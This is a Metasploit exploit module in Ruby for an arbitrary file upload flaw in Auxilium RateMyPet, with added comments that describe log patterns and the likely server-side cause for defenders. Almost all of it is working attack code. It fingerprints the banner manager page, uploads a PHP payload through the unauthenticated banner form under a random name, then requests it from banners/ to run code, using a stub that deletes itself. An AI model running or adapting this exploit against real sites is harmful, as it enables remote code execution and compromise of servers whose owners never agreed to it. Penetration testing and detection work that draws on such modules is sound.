GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/auxilium_upload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the Auxilium RateMyPet banner-upload flaw
# (OSVDB 85554, EDB 21329): the admin banner upload page stores the submitted
# file under the web-served banners/ directory.
#
# Reading this as a defender: the module issues a multipart POST to
# admin/sitebanners/upload_banners.php followed by a GET for a .php file under
# banners/. None of the requests built in this file sets a cookie or
# credential. That request pair is the pattern to look for in web-server logs.
# NOTE(review): the server-side cause is not visible here; presumably the upload
# page lacks an authenticated-session check and file-type validation, and
# banners/ allows script execution. Confirm against the application before
# choosing a fix.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and the single TARGETURI option.
  #
  # info - Hash of metadata handed in by the framework; merged with the values
  #        below through update_info.
  def initialize(info = {})
    module_info = {
      'Name' => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
      'Description' => %q{
        This module exploits a vulnerability found in Auxilium RateMyPet's. The site
        banner uploading feature can be abused to upload an arbitrary file to the web
        server, which is accessible in the 'banner' directory, thus allowing remote code
        execution.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'DaOne', # Vulnerability discovery
        'sinn3r' # Metasploit
      ],
      'References' => [
        ['OSVDB', '85554'],
        ['EDB', '21329']
      ],
      'Payload' => { 'BadChars' => "\x00" },
      'Platform' => %w[linux php],
      'Targets' => [
        ['Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }],
        ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
      ],
      'Privileged' => false,
      'DisclosureDate' => '2012-09-14',
      'DefaultTarget' => 0
    }
    super(update_info(info, module_info))

    base_dir_option = OptString.new(
      'TARGETURI',
      [true, 'The base directory to the application', '/Auxiliumpetratepro/']
    )
    register_options([base_dir_option])
  end

  # Fingerprints the target by fetching the banner manager page and looking for
  # its <title>. Nothing is uploaded.
  #
  # Returns CheckCode::Detected when the title is present (the page answered a
  # request that carried no credentials set by this method), else CheckCode::Safe.
  # "Detected" only means the page is reachable; it does not prove the upload is
  # accepted.
  #
  # NOTE(review): unlike #exploit, no trailing slash is appended to TARGETURI
  # here, so File.dirname resolves a path without one to its parent directory.
  def check
    # Appending "." makes File.dirname drop only the final segment, leaving the
    # application directory without its trailing slash.
    base = File.dirname("#{target_uri.path}.")
    banner_page = normalize_uri("#{base}/admin/sitebanners/upload_banners.php")

    res = send_request_raw({ 'uri' => banner_page })

    if res && res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Submits the banner upload form with the payload as the file part, then
  # requests the stored file from banners/.
  #
  # base      - application directory, no trailing slash
  # php_fname - file name sent in the multipart part and requested afterwards
  # p         - payload body sent as the "userfile" part
  #
  # Returns nil after printing an error when the upload gets no response or the
  # follow-up request returns 404; otherwise returns whatever handler returns.
  def upload_exec(base, php_fname, p)
    form = Rex::MIME::Message.new
    form.add_part('http://', nil, nil, "form-data; name=\"burl\"")
    form.add_part('', nil, nil, "form-data; name=\"alt\"")
    # The file part is labelled text/plain while its filename carries the
    # caller's extension; a server that trusts either value alone is not
    # validating the content.
    form.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")
    form.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")

    post_data = form.to_s

    print_status("Uploading payload (#{p.length.to_s} bytes)...")
    upload_request = {
      'method' => 'POST',
      'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => post_data
    }
    res = send_request_cgi(upload_request)

    # Only a missing response is treated as an upload failure; the status code
    # of the upload response is not inspected.
    unless res
      print_error("No response from host")
      return
    end

    print_status("Requesting '#{php_fname}'...")
    res = send_request_raw({ 'uri' => normalize_uri("#{base}/banners/#{php_fname}") })

    # Only an explicit 404 aborts; no response or any other status falls
    # through to handler.
    if res && res.code == 404
      print_error("Upload unsuccessful: #{res.code.to_s}")
      return
    end

    handler
  end

  # Entry point: derives the application directory from TARGETURI, picks a
  # random five-letter .php file name, builds the payload and hands all three
  # to #upload_exec.
  def exploit
    uri = normalize_uri(target_uri.path)
    uri << '/' unless uri.end_with?('/')
    # With the trailing slash guaranteed, dirname of "<uri>." is the
    # application directory itself.
    base = File.dirname("#{uri}.")

    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"

    # unlink_self asks the PhpEXE mixin for a stub that removes its own file
    # after it runs, so the uploaded file may no longer be on disk afterwards;
    # the request pair in the web-server log is the more durable artefact.
    p = get_write_exec_payload(unlink_self: true)

    upload_exec(base, php_fname, p)
  end
end